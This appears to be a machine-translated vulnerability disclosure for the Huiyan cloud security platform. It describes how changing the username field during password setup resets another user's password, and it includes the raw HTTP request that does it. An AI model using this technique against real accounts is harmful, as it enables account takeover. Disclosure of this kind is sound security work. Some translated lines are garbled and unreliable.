Wangkang technology Huiyan cloud security platform has the second-level password change Vulnerability (Official Website account \ Sina )
1. register an account and receive an email to continue registration,
2. Open the url in the mailbox and set the password
3. Change username to another account when submitting the application. The modification is successful.
POST /main/index/setpass HTTP/1.1Host: yun.netentsec.comProxy-Connection: keep-aliveContent-Length: 113Accept: application/json, text/javascript, */*; q=0.01Origin: http://yun.netentsec.comX-Requested-With: XMLHttpRequestContent-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://yun.netentsec.com/main/index/activation?from=ACTIVE_BY_URL&action=activation&t=3dce3f511744e6dbc649912325b7a118Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: username=36&email=aklf***%40163.com&pw=A******&newpw=A******&V1Nq0Lqkxqqgh6F=b05145d619fa53d0112583876eb93d76
Determine whether a user exists during registration to see which vendors are using wooyun
Official Website account: netentsec, sina
This figure is beautiful.
Solution:
Verify and verify.